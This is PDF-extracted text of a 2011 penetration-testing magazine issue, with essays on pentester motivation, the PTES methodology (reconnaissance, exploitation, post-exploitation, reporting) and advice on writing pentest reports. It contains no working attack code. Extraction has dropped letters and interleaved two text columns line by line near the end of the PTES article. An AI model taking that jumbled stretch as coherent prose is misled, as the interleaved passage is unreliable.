You are on page 1of 44

EDITORS NOTE

01/2011 (01)

Dear Readers,

TEAM
Editor: Sebastian Bula
sebastian.bula@software.com.pl
Proofreaders: Jonathan Edwards, Michael Munt, Edward
Werzyn Jr., David Small
Betatesters: Stefan Castille, Michael Munt, Juan Bidini, John J
Trinckes, Jr., Kyle Kennedy, David Small, Massimo Buso, Davide
Quarta, Santosh Kumar Rana
Senior Consultant/Publisher: Pawe Marciniak
CEO: Ewa Dudzic
ewa.dudzic@software.com.pl
Art Director: Ireneusz Pogroszewski
ireneusz.pogroszewski@software.com.pl
DTP: Ireneusz Pogroszewski
Production Director: Andrzej Kuca
andrzej.kuca@software.com.pl
Marketing Director: Sebastian Bula
sebastian.bula@software.com.pl
Publisher: Software Press Sp. z o.o. SK
02-682 Warszawa, ul. Bokserska 1
Phone: 1 917 338 3631
www.hakin9.org/en
Whilst every effort has been made to ensure the high quality of
the magazine, the editors make no warranty, express or implied,
concerning the results of content usage.
All trade marks presented in the magazine were used only for
informative purposes.
All rights to trade marks presented in the magazine are
reserved by the companies which own them.
To create graphs and diagrams we used
program
by

As one of our authors implied, penetration testing is an


industry; an industry with its own rights, established concepts
and ideas. Thankfully, its growing popularity should not be
measured only by the amount of pen testing quacks and con
artists taking it over (although the very idea that it already
needs fixing can act as a measurement of popularity in itself),
but also by the feedback the readers of PenTest Magazine
zero issue gave us. We published the teaser with the modest
idea that the fast-expanding penetration testing field deserves
its own magazine. Now, judging by the comments that we got
and the material our authors provided, we are absolutely sure
of it.
However, creating a penetration testing magazine proved to
be quite tricky. How do we make sure that the reader gets the
right impression of the kind of hacking we promote? There
were some great authors who submitted splendid articles
sharing their hacking pen testing! solutions, which we
all worked on hard to improve in terms of terminology and
the message, or, in some extreme cases, could not accept
at all. The trick mentioned before is that the idea behind
PenTest Magazine was to stay clear of any questionable
aspects of hacking: it is not our intention to teach how to
hack for any reasons different from genuine, professional
penetration testing. I believe thanks to our great beta testers
and proofreaders that we are at least heading in the right
direction.
Thus, the first issue of PenTest Magazine focuses on standards
and, hopefully, will provoke more discussion about the basic
and ideological concepts of pen testing. It features Fixing the
Industry, which you might already know from the zero issue,
improved by some commentary by the readers. David Small
will tackle a seemingly trivial question of what drives or at
least should drive pen testers to be pen testers, and it really
should not be viewed as preaching about ideals. Finally, Bill
Mathews will help you write a good penetration test report,
which seems to be an indispensable part of every pen test if
you want to be regarded as a professional in the field.
Enjoy your reading and dont forget to submit your comments
on the subject brought up.
Enjoy your reading
Sebastian Bua
& Penetration Test Magazine Team

Mathematical formulas created by Design Science MathType

DISCLAIMER!

The techniques described in our articles may only


be used in private, local networks. The editors
hold no responsibility for misuse of the presented
techniques or consequent data loss.

01/2011 (1) May

Page 2

http://pentestmag.com

CONTENTS

POINT OF VIEW

WEB APPLICATION SECURITY

04 Why We Do It

28 Heuristic Methods vs Automated


Scanners

by David Small

by Hans-Michael Varbaek

STANDARDS

06 Fixing the Industry

by Iftach Ian Amit and Chris Nickerson


Penetration testing has been a skill (some say an art) for
as long as we can remember information security and the
computer industry. Nevertheless, over the past decade
or so, the term has been completely ambiguated. It has
been cannibalized, commercialized, and transformed into
a market where charlatans and professionals are on the
same playing field.

12 Building a Better Penetration Test


Report
by Bill Mathews

Recently Ive had the, ahem, pleasure of reading and


reviewing a number of penetration test reports from
various internal and third-party resources. For fear of
getting someone into a good deal of trouble my source
shall rename nameless. My first thought was wow, this is
a wild and varied industry we are in. My second thought
was, how is this stuff useful to someone trying to fix the
issues found? In the majority of the reports it wasnt
obvious what the problem even was, let alone what one
would do to fix it. This is a pretty well known problem in
the infosec industry as a whole, we tend to overtalk the
problem.

BLACK BOX

18 How Fuzzy Are You Today? A Guide


to Client-Side Fuzzing Using Peach
by Adrian Furtuna

What do you do if your targets are fully patched and you


do not find any configuration issues during a penetration
test? Do you take the blue pill and tell the client hes safe
(and everybodys happy) or do you take the red pill and
go deep into the rabbit hole to find those hidden bugs?
Lets take the red pill and see what happens...

NETWORK SECURITY

As most penetration testers know, a manual check of


a Web Application can be much more thorough than a
completely automated one. Combining a few assistant
tools like a transparent proxy, and perhaps a scanner
that may find overlooked parts, is a good way to conduct
e.g. an assessment of actual vulnerabilities. The manual
methodology however, differs a lot from one ethical
hacker to another, and in many cases only very basic
(common) ways of approach are used.

HOW-TO

34 Operationalizing Penetration Testing


Results Using Network Monitoring
Software All For Free
by Bill Mathews

Penetration Testing these days is often done on a oneoff basis, meaning companies do them once a month,
once a quarter or once a year and then never think
about them again. I find that to be a shame and think
that penetration testing can be an invaluable tool in
vulnerability management when performed properly.

TOOLS

36 Pulling Shellcode From Network


Stream
by Salahudin Wan Khairuzzaman

Metasploit framework provides ready to run shellcode


modules that can be compiled easily. Earlier days of
exploitation with shellcode required lots of coding and
programming efforts. Metasploit has simplified this
in their framework. In this article, we will use several
security tools to pull the shellcode from network stream
and analyze the output.

INTERVIEW

40 Interview with Gary McGraw


by PenTest Magazine Team

Gary McGraw from Cigital about his views on software


security and the Building Security In Maturity Model.

24 Dueling Apache Tomcat


by Jovon Itwaru

Setting up a JSP-enabled web server is cumbersome and


complex. Apache Tomcat aims to solve this dilemma by
providing a quick, easy, and cost-effective solution for
developers to deploy their applications and services. While
this is great for functionality, its default configuration can
greatly decrease the security of a network. In this article,
we will explore these vulnerabilities and how penetration
testers can use them to their advantage.

01/2011 (1) May

Page 3

http://pentestmag.com

POINT OF VIEW

Pen Testing:
Why We Do It
Were penetration testers. What do we do? Why do we do it? What
does it say about us?

here are some misconceptions about pentesters. From a shallow look, they appear to be
people who break into computer systems, with
tools designed to do just that. But this isnt the case;
allow me to explain.
The Internet is full of people who try to break into
computers connected to it. This happens all the time.
A computers defenses are generally up to one or two
people; thats us.
We do tedious things. We keep track of the OS and
current software, and patch everything as soon as
patches are issued. We read system logs. We check
permissions. We leave honey-traps. We look for things
that smell wrong. It takes discipline on our end to do all
of these things. Because we do this, its not easy, and
its not quick, to crack into the machines were trying to
protect.
And one of the things we do is to test our security. Its
no different than you giving your doorknob a shake after
youve locked it, to make sure it wont turn, and that the
bolt is engaged and wont open with a simple push. For
most people thats a habit they dont even think about.
Thats penetration testing.
Now an attacker has some sort of motive to try to
get in to our systems. However, its usually something
simple like rooting another machine. There are so
incredibly many computer systems which are simple to
get into that we hope that attackers will become bored
01/2011 (1) May

and invest their energies someplace else. (This is the


low-hanging-fruit principle.)
But we also hope the attackers will get bored with
doing something thats no challenge, and start doing
something harder, namely, work on securing computers.
Thats a very hard challenge.
As I said, most attackers will test out a few really
obvious ways into your computer, and if they dont
work, theyll move on the next machine. It may tell you
something that theyre called script kiddies.
Would you like to do something far harder? Would
you like to earn the respect of the small community
of security people? Theres room for researchers,
consultants, even writers for magazines. (And certainly
the pay isnt bad, either.)
There are few things like knowing youre one of the
best.
U.S. President John F. Kennedy said it very well back
in 1962, when he started Project Apollo, to land on the
moon by 1970:
We choose to go to the moon. We choose to go to
the moon in this decade and do the other things, not
because they are easy, but because they are hard,
because that goal will serve to organize and measure
the best of our energies and skills

DAVID SMALL

Page 4

http://pentestmag.com

STANDARDS

Fixing the Industry


Penetration testing has been a skill (some say an art) for as long
as we can remember information security and the computer
industry. Nevertheless, over the past decade or so, the term
has been completely ambiguated. It has been cannibalized,
commercialized, and transformed into a market where charlatans
and professionals are on the same playing field.

he commercial industry has embraced the


Sexyness of penetration tests, built products
around it uprooted its values with product marketing
and sales speak, and conned organizations into buying
deeper and deeper to the dreaded pentest unit (as in I
need 2 units of pentest to complete this compliance effort).
Backed by a thriving regulatory compliance rush to checkoff as many items as they can on audit lists, pentesting
was given the final blow to its heritage of value. A once
surgical skill that required innovation, critical thinking,
technical savvy, business understanding, and good old
hacker-sense was reduced to a check box on the back of
a consulting companies marketing material.
This type of market commoditization has led to the
frustration of many businesses and consultants alike.
With this in mind, a group of security veterans (each one

Commercializing security tools and Compliance


are giving the industry a double-blow
with at least a decade under their belts, and numerous
successful penetration tests in various industries) have
gotten together to discuss the state of the industry, and a
common gripe was echoed. Many of the venting sessions
from professionals around the world centered around
the wide array of testing quality within penetration tests.
This huge gap was often boiled down to the Scanner/
Tool Tests and the Real Testing arguments. Another
common theme for these sessions was the decided
01/2011 (1) May

lack of value presented by the Scanner type of testing


and some brainstorming of how that could be resolved
worldwide. This issue was not localized or specific to any
vertical but it was something that InfoSec professionals
from all around the globe were experiencing. From these
sessions happening at EVERY security conference
thrown an idea was born. The idea to finally standardize
and define what a penetration test really is. This would
help the testers increase the quality and repeatability of
the testing while also giving the organizations doing the
testing, a reference list of what is to be done during the
test. This is where the Penetration Testing Execution
Standard (PTES) started. After a couple of months of
working behind the scenes, a group of about a dozen
security practitioners from different parts of the industry
put forth a basic mind map of how they did penetration
tests. Later on, that blended map was released to a larger
group of InfoSec professionals. This group tore apart the
original map and streamlined it to fit a larger and wider
audience. At that point a final rendition of the mindmap
was constructed between 25+ International InfoSec
Professionals. With over 1800 revisions to the Alpha
mindmap, the team then opened up the stage for more
massive collaboration and started building one of the
more exciting concepts in the security industry. Currently
the Penetration Testing Execution Standard is backed by
dozens of volunteers from all around the world, working in
teams on writing the finer details of what will be the golden

Page 6

http://pentestmag.com

standard for penetration testing for organizations as small


as a 15 people company, and as large as a government
agency or a nations critical infrastructure.
The standard spans seven sections that define the
content of a penetration test. These sections cover
everything from how to formalize the engagement
legally and commercially, up to what areas the final
report should cover. Following is an overview of the
seven sections and what they reflect in terms of how a
penetration test should be conducted.
In this section the standard defines some basic rules
of engagement, scoping, points of contact, and most
importantly goals for the engagement. It is often neglected
and overlooked (as in our previous example of two pentest
units that are usually followed by a website or an IP
address to be tested), and one of the main reasons for
organizations not getting any value out of such testing. The
section goes on to define what are the allowed resources
that the tester can utilize in the business, and the tester is
given an opportunity to gain a better understanding of what
is the business aspect that is being scrutinized, and what
are the real goals of the test (which are NEVER a server,
an application, or even a network). In addition to the goal/
value oriented approach of the tester, the organizations
receiving the test (customer) will also be able to reference
this section. The customer will be able to set guidelines for
the test, understand the safeguards put in place and have
a full understanding of the communication pathways that
will be open throughout the test. Often times, customers
do not have the appropriate channel of communication
with the testing group and it causes confusion in the testing
process. We aim to make the goals and tests performed
clear to both sides well before the testing begins.

perceived by an investigative attacker. A lot of information


is being spilled out through unauthorized (and seemingly
legitimate) channels, social media, and just plain old bad
policies. It is crucial for the tested organization to see
exactly what information is available out there in order to
either prepare for such information being used against them
or fix any policy/training gaps that it may have in relation to
information disclosure. Until this exercise is performed, most
companies do not understand the gravity of the information
that can be collected about them. For example: If a tester
can identify that the customer is using an unpatched version
of Acrobat (found through the analysis of metadata within
a published document), they are a prime candidate for a
client side/malicious file attachment attach. Also, if there
are sensitive documents published on corporate directed
locations, it may pose an even bigger risk (i.e. VPN Login
instructions on a public webserver; Yeswe ran into these
many times in the past).
The information and intelligence gathering phase
aims to gather as much information as possible about
the target and fully explore the increased threat surface
to attack. The standard covers digital collection through
open source intelligence resources as well as paid for
resources, physical on-site collection and observation,
and human intelligence collection. After all, the more a
tester has to attack the more comprehensive the results
will be. This is the most aggressive approach available
but will not be required for all strengths of tests. Its
important to note that the standard will also define levels
or strength of operations within each section which
would allow small engagements to employ the more
standard OSINT (Open Source Intelligence) methods,
and larger scale or higher level/strength engagements
to include the more elaborate on-site, physical and
HUMINT (Human Intelligence) elements.

Information and Intelligence Gathering

Threat Modeling

Pre-Engagement interaction

In this section the standard really kicks in. This is where


we were receiving the most comments in the lines of this
is too expensive, we dont know how to do this, and this
is not really necessary. From our collective experience
(at least the founding team) we can clearly state that
when this phase is done right, we can already know the
outcome of the pentest. During the intelligence-gathering
phase, the tester aims to build a comprehensive as
possible picture of the target organization. Everything
from corporate information, the vertical in which the
organization is operating in, business processes that are
crucial to the business, financial information and all the way
up to mapping out specific personnel, their online social
presence and how to use all of that information in a way that
an attacker would use. On the other hand, the organization
being tested will finally get a clear overview of how it is being
01/2011 (1) May

The threat-modeling section provides the tester and the


organization with clear documentation of the relevant
threat communities as well as the assets and their values.
The threat modeling is performed around two central
lines the attacker, and the business assets. From an
attacker perspective, all the relevant threat communities
are identified, researched, documented, and their
capabilities are fully analyzed and documented.
From a business asset perspective, all the critical business
assets (physical, logical, process, 3rd party, intellectual,
etc.) are identified. During the documentation phase of
these assets, every relevant supporting technology system
is mapped, along with the relevant personnel, interaction,
processing, and the information lifecycle.
The main output from this phase is a well-documented
threat model that takes into account the data gathered

Page 7

http://pentestmag.com

STANDARDS
and analyzed at the intelligence gathering phase, and can
be used to create attack trees and map out venues for
vulnerability analysis of key processes and technologies.
This is another key component to providing value in
Penetration Testing. If the customer does not know what the
threat is to the business or the actual risk, why should they
resolve the issue. Threat Modeling provides a weighting
system so that testers can rely less on a screenshot of a
shell and more on the overall value to the business.

Vulnerability Analysis

Only at this stage we run into what more traditional


penetration tests actually include in their scope. As we
can clearly see, the new penetration testing execution
standard provides a much more thorough background
both from a business understanding, as well as from a
technical perspective to the test. Leveraging this extensive
research, the vulnerability analysis phase (which can
sometimes be considered as a technology centric threat
modeling) defines the extensive coverage of mapping
out and documenting any vulnerability in processes,
physical infrastructure, and of course technology related
elements. This phase does include some interaction
with the organization, as the testers probe for services
and equipment, confirm assumptions made at the
threat modeling and intelligence gathering phases, and
fingerprint the underlying software being deployed.
One of the deliverables from this phase (on top of the
actual vulnerability mapping and assertion) is attack trees
that correspond to the entire process thus far. This by
itself can provide a lot of value to the organization as a
living document that can be updated with relevant threats,
vulnerabilities and exposure that is used as one of the
parameters for the ongoing risk management practice.
Mind you, this is not just running a scan or port
mapping. This is a comprehensive process to analyze
the data collected for attack routes as well as identify
venues for attacks. The tester will leverage conventional
and unconventional ways to identify vulnerabilities from
missing patches, open services, misconfigurations,
default passwords, Intellectual Property leakage,
increased threat through information (leaked passwords/
docs), and much more. This hybrid approach allows
the testers to collect actionable information and rank
the ease of attacks. Once the tester has analyzed the
potential vulnerabilities present, they will have a clear
picture of what/why/how/where and when to execute
attacks to confirm the validity of that vulnerability.

Exploitation

The exploitation section is very close to the common scope


of penetration tests these days. It includes the actual attack
execution against the organization. With all the proper
01/2011 (1) May

intelligence, threat modeling and vulnerability analysis in


place; this phase becomes much more focused and more
importantly much more fine-tuned to the organization being
tested. In a proper penetration test, we should not just see
spread-spectrum scans and exploitation attempts on
every conceivable technology from a tool or two, but also
(and again much more importantly) a dedicated attack
path that lends from the true assets that the organization
holds and the specific vulnerabilities (either technology
related or human/process related). This type of validation
is a process that is often lost in the throw all the attacks we
have at it type automation. Here, the standard aims to act
on the vulnerabilities identified and confirm or refute their
existence. Many testers and testing tools, due to lack of
actionable intelligence or poor planning, will run exploits
against hosts that do not have the exploitable package
running or even installed. This causes undue increased
traffic and potential risk to the business environment.

Post-Exploitation

At this point most pentests conclude the engagement


and provide a report that includes every finding with
some sort of traffic light rating (low, medium, high...) that
is pre-baked into the reporting tool. However, real world
attacks would not suffice in getting a foothold inside the
organization, and would try to leverage it further either
trying to obtain additional information/resources, or to
actually find a way to exfiltrate the information/control
outside of the organization. The exfiltration and access
to the data types or control systems will fit directly into
the threat modeling conducted earlier in the process.
The tester will be able to show the real company impact
of certain attacks and why they are relevant to the
company (i.e. there is a big difference in showing an
executive a screenshot of a shell than showing them
the interface THEY use to change the General Ledger
within the ERP system. This type of focus provides an
instant impact and is formatted in the language that
makes sense to the business).
The post-exploitation phase defines the scope of
such additional tasks, that provide the organization with
a way to see how would it really stand up to such an
attack, and whether it would be able to identify related
data breaches and leaks. Conducting this focused
attack on resources paints a very clear and concise
picture of the threats capability and its possible effects
on the business as a whole.

Reporting

Finally this trip through an attackers modus-operandi


needs to be concluded with a clear and useful report,
for the organization to actually see value from such an
engagement. The value is not limited to documenting

Page 8

http://pentestmag.com

the technical gaps that need to be addressed, but also an additional value to the customer as they are allowed
needs to provide a more executive-level report that to test the effectiveness of their defensive monitoring
reflects the organizations exposure to loss in business systems and/or outsources solutions.
terms (financial). This would include the actual meaning
At the end of the day, the forces of the industry will
of which assets are at the highest risk, how much dictate what a penetration test will look like and what
resources are used to protect different assets, and a would it contain. Nevertheless, the PTES is aimed to
recommendation on how to more efficiently close any provide the industry with a baseline it clearly lacks now.
gaps in exposure by spending resources on controls The term has been mutated over many iterations and
and protections more intelligently.
it has been given a very narrow freedom to operate
Such a recommendation would not have been possible between the minimum that has been dictated by
without the surrounding activities that provide the business regulatory requirements (which did good and actually
relevance of the exercise and the tested business forced more businesses to test themselves), and the
elements. This is also where the organization would glass ceiling that has been created de-facto by the
end up finding the most value out of the engagement, hordes of pentesters that know nothing better than
as opposed to most common pentests which leave it using some product to push out a report to the customer
with a laundry-list of exploits and vulnerabilities, without and move on to the next. By clearly defining the term
their actual relevance or business impact. In the report, (which is used in a multitude of standards without an
the tester will be required to identify the symptomatic adequate definition of what it means or consists of)
vulnerabilities (like a patch missing) as well as tie out the and what the purpose, value and components of a
systemic vulnerabilities a patch is missing BECAUSE Penetration Test are, PTES will increase the confidence
there are gaps in policy and procedure in x/y/z area which of customers and testers alike. For quite some time
allowed for the patch to not be
now, organizations expect
Measuring detection and incident response is an the value of conducting a
installed in a timely manner or
integrated part of a penetration test
within the specified time)
Penetration test to be not
Its important to note that although there isnt a much more than a rubber stamp on the audit report or a
dedicated section for detection and incident response, ticked checkbox on their compliance worksheet. PTES
the organizations capabilities to identify, and react to is attempting to increase that value and blow some wind
anything from the intelligence gathering, through the into the dwindling sails of what once was a critical part
vulnerability analysis, exploitation and post exploitation of running a secure operations. In the modern days
is also put to the test. The penetration test includes where everyone being so easily hacked by an APT isnt
direct references to such capabilities in each section (as it time our testers start acting like one? Or would you
well as in the reporting section), and can be extremely rather an Automated Penetration Test (APT) that you
useful to clearly identify the organization maturity in pay for and does not even attempt to learn WHY they
terms of risk management and handling. This provides are doing the test in the first place?

IFTACH IAN AMIT

CHRIS NICKERSON

brings over a decade of experience in


the security industry, and a mixture of
software development, OS, network
and Web security expertise as Vice
President Consulting to the top-tier
security consulting firm SecurityArt. Prior to Security-Art, Ian was
the Director of Security Research at
Aladdin and Finjan. Ian has also held
leadership roles as founder and CTO
of a security startup in the IDS/IPS
arena, and a director at Datavantage. Prior to Datavantage,
he managed the Internet Applications as well as the UNIX
departments at the security consulting firm Comsec.
Ian is a frequent speaker at the leading industry conferences
such as BlackHat, DefCon, Infosec, Hacker-Halted, FIRST,
BruCon, SOURCE, ph-neutral, and many more.

Chris Nickerson, CEO of LARES, is just


another Security guy with a whole
bunch of certs whose main area of
expertise is focused on Real world Attack
Modeling, Red Team Testing and Infosec
Testing. At Lares, Chris leads a team
of security professional who conduct
Risk Assessments, Penetration testing,
Application Testing, Social Engineering, Red Team Testing and
Full Adversarial Attack Modeling. Prior to starting Lares, Chris
was Dir. of Security Services at Alternative Technology, a Sr. IT
compliance at KPMG, Sr. Security Architect and Compliance
Manager at Sprint Corporate Security. Chris is a member of
many security groups and was also a featured member of TruTVs
Tiger Team. Chris is the cohost of the Exotic liability Podcast, the
author of the upcoming RED TEAM TESTING book published by
Elsevier/Syngress and a founding member of BSIDES Conference.

01/2011 (1) May

Page 9

http://pentestmag.com

STANDARDS
Comment
Penetration Testing Execution Standard (PTES)
provides a great start for information security
professionals who are new to penetration testing and
vulnerability analysis. As a novice one always wonders
what is a good starting point and PTES definitely
provides an excellent view of the landscape.
Another salient feature of PTES is that it is developed
by a group of professionals rather than one single
organization or institution. It must have been a
challenge to blend in various mindmaps and come
up with a monolithic structure. It would be interesting
to see if PTES go down The Open Web Application
Security Project (OWASP) route where the
documentation is augmented with videos, tutorials
and tools and receives tremendous professional
support and participation.

ABY RAO

I think this is a great project and far overdue for our


profession in my opinion. Security companies and
consultants in the field have blurred the line between
true penetration testing and vulnerability testing.
Running an automatic scanner might be a starting
point to identify potential vulnerabilities but it is NOT
to be considered an all-inclusive penetration test. I do
not feel that we will ever be able to rely on a completely
automate testing solutions as they will always lack the
testers experience, prone to false positives, or able to
adapt varying environments that require non-standard
approaches.

JEFF WEAVER

Aby Rao CISSP, Security+, ITIL, Project+, ISO/IEC 20000


Principal, Verve Security (http://www.vervesecurity.com)

Upcoming events
TakeDownCon is a brand new information security
conference series, created by EC-Council. This highly technical
information security conference series is very focused the
theme of this first of the series is Taking Down Security,
focusing on attack and defense vectors. World class experts
including Barnaby Jack, Kanen Flowers, Joe McCray, Rodrigo
Branco, Sean Arries, among others, will demonstrate and
showcase how security systems can be taken down at ease.
This 2 days conference, in a very casual and relaxed setting, is
targeted towards information security researchers, engineers
and technical professionals. http://www.takedowncon.com
III Security Forum will take place in
the Techinical Scool, in Carlos Casares,
Buenos Aires, Argentina. Security
experts will talk on the following: 2600
& BuenosAiresLibre.org checking
your companys security Privacity in
Social Networks Impossible mission?
Wireless Hacking Secure Solution
with *BSD http://www.eetcasares.org/
sign

Sr. Network Security Engineer

Comment

Secure Ninja Expert Training & Certification


Preferred Pricing Pen Test Magazine Subscribers
Pen Test Magazine has secured an agreement with Secure
Ninja to offer subscribers special discounts on their expert
training classes. Watch our newsletter for special promo
codes granting the discount. To review the list of available
courses, please visit http://secureninja.com/. Subscribe and
expect more special offers in the future!
If you have any comments on a subject
brought up in an article you have read
in a teaser, dont hesitate to submit
your thoughts. Send your comments
at sebastian.bula@software.com.pl (as the subject of your
mail: the title of the article+commentary). Make it short
(a few sentences), but informational. Add your name and
the company youre representing, or your job title. The most
interesting comments will be published in the magazine
alongside the full articles.

Say Hello to
Red Team
Tesng!
Security Art's Red Team service operates on all fronts
on behalf of the organizaon, evaluang all
informaon security layers for possible vulnerabilies.
Only Red Team tesng provides you with live
feedback on the true level of your organizaonal
security.
Thinking creavely! Thats our approach to your test.
Security Arts Red-Team methodology
consists of:
1. Informaon and intelligence gathering
2. Threat modeling
3. Vulnerability assessment
4. Exploitaon
5. Risk analysis and quanficaon of
threats to monetary values
6. Reporng

Ready to see actual


benefits from your
next security review?
info@security-art.com
Or call US Toll free:
1 800 300 3909
UK Toll free:
0 808 101 2722

www.security-art.com
Page

STANDARDS

Building a Better
Penetration Test Report
Do you build reports for your penetration tests? Want to make
them more useful and more readable? This article is for you.
Various tips are spelled out that have proven effective for the
author over the years.

ecently Ive had the, ahem, pleasure of reading


and reviewing a number of penetration test
reports from various internal and third-party
resources. For fear of getting someone into a good deal
of trouble my source shall rename nameless. My first
thought was wow, this is a wild and varied industry we
are in. My second thought was, how is this stuff useful to
someone trying to fix the issues found? In the majority
of the reports it wasnt obvious what the problem even
was, let alone what one would do to fix it. This is a pretty
well known problem in the infosec industry as a whole,
we tend to overtalk the problem. That is, and I know a
number of folks who do this regularly, we simply cannot
distill a problem or issue down into an actionable item.
At least not in writing. We like to explain exactly how
clever we are and exactly how we found an issue but
how to fix it is usually the last thing on our minds. This of
course isnt in all cases, but out of these reports I got to
look over it was the case in most instances. I am going
to attempt to outline how to build a better penetration
test report and Im going to use a category then list
format for easy digestion. If you dont like lists because
they are overused please withhold your anger, they are
overused for a reason, people like them.

and off you go. This is not or should not be further from
the case. Remember whether youre a third-party tester
or an internal tester, the executives pay your bills, be
nice to them! The reports I reviewed basically had an
executive summary that said either Your stuff is broken
beyond repair or You need to pay us to come fix it for
you. Neither are really good messages to send to nontechnical executives. Below are some tips for driving
the point home without being insulting and without over
or understating the problems.

Executive Summaries

This is often a VERY overlooked part of any report.


Folks think you just include some charts and graphs
01/2011 (1) May

Page 12

Charts and graphs can be useful and powerful tools


as long as theyre properly used. The ones I like to
see break down the issues by severity and then by
severity and by category. This will tell the executive
exactly where the discovered issues are and how
bad they are. This provides a snapshot they can
use to allocate resources appropriately. See useful
and powerful!
Provide a set of scenarios for each issue or
category of issues ranging from best case to worst
case as it relates to the business youre (or your
client is) in. This allows them a better understanding
of what the vulnerability could lead to. Save the
drama and stick to something that might have
a reasonable shot of happening. Someone is
probably not going to leverage an XSS vulnerability
on a toy makers website to set off a nuclear
http://pentestmag.com

explosion that brings about the zombie apocalypse.


I mean, it COULD happen but maybe save that one
for your fiction writing class. The more realistic the
better here.
Provide a non-technical explanation of the
vulnerability. I know this one is tough but stay with
me. Executives, for the most part, arent technical
people and thats no reason to be insulting to
them. They have different skills, like balancing
checkbooks and managing people, so, in English
(or the language of your land), explain the problem,
clearly. Some German physicist once said You do
not really understand something unless you can
explain it to your grandmother. He was a pretty
smart guy, we should carry that quote with us when
building our executive summaries or in reports in
general.
Try to include some criticality rankings as it relates
to their industry. For instance, if the industry bestpractice is to rate an XSS hole as a high criticality
say that, then explain why you may have marked
it as medium if that is the
case. There are mitigating
circumstances in a lot of
cases that may cause
you to do this. It is
okay to not mark
everything as high
especially when
the
vulnerability
doesnt
warrant
it. Another example
from my report reviews,
every case of being
able to find version
information about a
service was marked
as a high criticality
issue. It made me very
sad.
Ultimately
your
executive summary should
tell what is wrong, in what
places and how bad. The
keep it simple principle
applies here as it does to
most things.

technical glory but wait! You might want to consider


your audience first. Typically youre not presenting
your results to security people. Typically theyre being
presented to a more-technical-than-our-hypotheticalmanager-above manager. That manager will then break
apart your report for distribution to the appropriate
parties. Web developers, database administrators,
network administrators, etc will be getting their own
chunked up version of your report. This requires some
forethought on your part for how you design your
vulnerability reporting. Heres a list of steps I think are
useful for vulnerability reporting, you should consider
including these along with any specific requirements
your client or company might have.

Vulnerability Reporting

This section of a report is often


were the rubber meets the road
so to speak. This is where you get
to report your findings in all their deep,
01/2011 (1) May

Page 13

Assign a unique vulnerability ID, well unique to you,


your client or company. This helps with tracking the
issue throughout the remediation process. It also
helps so the tech folks to communicate the status
of a particular issue up the chain. Something like
department code-vulntype-number would work for
this. So, 001-web-010 would identify a vulnerability
in department code 001, it is classified as a web
attack and then an identifying
number.
Remember to try to speak
your end audiences language.
Even the best web developer
may not be aware of CSRF by
that name so make sure you
take the time to explain the
issue. If she were to try
to explain advanced web
usability standards to you,
you probably would drift off
too. I know we think what
we do is the most important
thing in the whole galaxy
(and it is) but not everyone
shares that opinion. This
is especially true if they have
experienced
a
rather
unenlightened
security
person before that tried to
tell them not only was their
code insecure but it lacked
comments and readability.
Yes, that was in one of the
reports I had a chance to
peruse. Try not to be THAT
security person.
Make each vulnerability stand on
its own remembering that your report is
http://pentestmag.com

STANDARDS

probably going to be distributed in chunks. If one


vulnerability depends or is related to another, you
should note that in a relates to section. This helps
the manager to know to distribute that issue with
its related issue whether it belongs to that specific
group or not.
Include an evidence section that is fairly detailed as
to what actually happened! Screenshots, videos,
packet captures and details, these are all welcome
here. This is where you can be more technical
to cover what the problem actually is. Again, it is
not enough to just insert Suzie waz h3r3 into a
database. Be as descriptive as possible. What
page was the problem located at? What fields were
vulnerable? What did you do to find the problem?
How can it be reproduced? These are essential
questions to answer in a vulnerability report.
Include some industry references. Its awesome to
include a CVE or OSVDB for some packaged piece
of commercial software where you discover the
application that hasnt been patched. You should go
further. If you find a SQL Injection in a custom piece
of code, point to some industry standard resources
on the issue. This helps educate the folks involved
with the applications and will hopefully result in
more secure code being written. That is our end
goal, right?

rely 100% on the scan data but you use it. The question
is, should you just, by default, provide the scan data with
your report? This one causes a pretty heated argument
in my head. On one hand I think you should just include
the full tool data with your report, you used a scanner,
some web application discovery tool, etc, you should
provide the raw data. On the other hand I balance this
with the fact that the number one complaint I hear about
penetration testing reports is they dropped 60 pounds
of paper on my desk and just left it there, what am I
supposed to do with that? Here is what I think should be
done with tool data:

Tool Data and Use

Everyone uses scanners, if you claim otherwise, either


you are not paying attention or not being
honest with yourself. You may not

Dont provide the raw data by default, let the


necessary parties know it is available upon request
but generally providing it straight away leads to
comments like the one above and a lot of confusion.
You are paid to interpret the results, not the end
reader of your report. The tools you use should just
be that, tools that provide to-be-analyzed data, not
to be used for end reports.
As I said I am conflicted about this so if you are too
then by all means, provide some tool data with your
vulnerability reports.You just want to avoid copying
and pasting the whole scan log into your report for
instance. Perhaps note in a Identified by section
that details how you found the particular issue.
This is a great place to include some tool data as it
relates specifically to that vulnerability. Maybe even
include a heres how to test for this vulnerability
yourself with tool x bit in there. Again, its about
educating your audience.
Dont be shy about saying what tool
you used to find what. This show
proficiency in your craft,
unless
of

course, you
only used Web Killer 2020 as the only tool.
That just shows a lack of attention to detail. Yet
another example from my report review, EVERY
vulnerability was found with AppScan. Now Im not
denigrating AppScan at all (thats another article)
but it should never, ever be the only tool you use in
your work. No tool should be. You should develop a
varied ecosystem of tools that you use in particular
circumstances and dont be afraid to add new ones,
after an appropriate test period of course.
01/2011 (1) May

Page 14

http://pentestmag.com

Open Source tools. Do you use them? If not, you


should add some to your arsenal. My philosophy
is and always has been that an attacker, kiddie
or otherwise, is NOT going to go out and spend
$50,000 on a tool to exploit some hole, they will
probably pirate it. Seriously though, they will go get
some open source tool or write their own. Either
way, the giant price tag tools will not help you in all
these circumstances. One word of caution, dont
just blindly include open source tools data into your
reports (you really should never blindly do anything
of course), the reason being the authors sometimes
like to use colorful language you may not want your
end audience to see.
Generally speaking though, keep your report to the
analysis of the results of all these various tools,
learn to manually verify the results. This analysis is
the value you provide. Its one thing to penetrate a
network but if you cant explain how you did it then
did you really do anything of worth? If you arent
providing value then you are just a paid buttonpusher, thats not really what you want to be is it?

Reporting from Experience

Your client or employer didnt hire you for your looks.


You were hired, presumably, because you have some
experience in this field so why are you not using it?
Reporting from experience is quite powerful. The term
Ive seen this before is the ultimate confidence builder,
it is what manager live for. Being able to relate an issue
or vulnerability back to past experience is a powerful
way of saying Ive seen this before and heres what we
should do. You should be doing that.

If youre a third party tester, tell your client if youve


seen the exact issue before and explain what
your previous client did about it. This is a great
reporting technique and relays your experience
with confidence. It allows you to provide a track
record of a particular remediation technique for
your customers. Possibly you could even build a
trust factor into your remediation solutions. This
could be an article in and of itself but basically
youre putting a score on your confidence a given
solution will work for a particular issue. Customers
and other departments will like that.
If you are an internal resource without much
